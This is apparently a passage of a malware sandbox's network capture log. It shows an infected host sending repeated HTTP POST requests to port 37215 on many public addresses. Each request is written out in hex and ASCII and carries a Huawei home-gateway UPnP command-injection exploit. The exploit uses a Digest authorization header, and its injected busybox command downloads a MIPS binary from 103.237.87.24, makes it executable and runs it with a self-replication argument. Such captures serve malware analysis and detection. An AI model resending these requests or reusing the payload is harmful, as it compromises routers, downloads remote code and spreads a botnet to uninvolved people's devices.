6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  691192.168.2.1359984157.143.237.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308784962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  692192.168.2.135815070.36.105.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308785915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  693192.168.2.135385641.15.33.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308806896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  694192.168.2.1332898139.32.217.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308808088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  695192.168.2.1340378197.16.234.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308824062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  696192.168.2.134475041.230.163.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308845043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  697192.168.2.1345834145.210.187.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308852911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  698192.168.2.135412241.62.172.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308875084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  699192.168.2.133508041.190.61.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.309159040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  700192.168.2.1356768154.12.31.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.309170961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  701192.168.2.1356520157.37.192.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.309181929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
